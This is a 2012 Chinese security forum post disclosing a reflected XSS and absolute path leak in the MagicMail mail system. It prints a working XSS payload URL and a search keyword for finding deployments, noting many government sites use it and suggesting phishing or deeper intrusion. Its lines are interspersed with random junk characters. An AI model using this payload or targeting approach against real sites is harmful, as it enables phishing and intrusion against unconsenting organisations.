中国网络渗透测试联盟

标题: MagicMail迈捷邮件系统XSS及绝对路径漏洞 [打印本页]
作者: admin    时间: 2012-11-9 20:38
标题: MagicMail迈捷邮件系统XSS及绝对路径漏洞
今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞( G1 r" c3 t4 e9 S2 K3 |, s% |

. L) ]5 @+ {/ |$ E& b : ~( K# C8 U. t$ S
包含  一个反射性XSS  以及  绝对路径泄漏; Y% g) ~; {+ d' G+ M
看了看 貌似全部是linux的。' S( ~7 X$ o+ f$ S& \
; w. F3 M% p# G  B
关键字:迈捷邮件系统 by MagicMail
/ J2 k: W8 {& k
  K6 O0 n  J* O# K% o3 ~$ l5 d可以看到很多政府网站都用这个邮件系统
4 {, E* W- A( E- s: b+ v, v: q! T" J) P5 A2 D
绝对路径 http://madman.in/index.php?login_type=declare&language=
; v+ `& b, j1 S. a# `2 u# G0 F+ ^  p! K5 H

+ L# b* S. G2 O9 r: D; ]! }1 i9 n6 i7 [9 v
XSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
' @- h0 d: n+ r* u- o1 D& ~' f& H% m! I7 z7 w

$ i- m1 K1 f% g) u. M; q" [/ M) p4 M5 n' p" m
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等
9 ~8 ]# h5 w" [( b
4 j( R/ r& d0 _0 @4 n修复方案:看官方补丁吧。% L& I" B* A+ |% G) L  e$ Q* U! G1 o2 I




欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2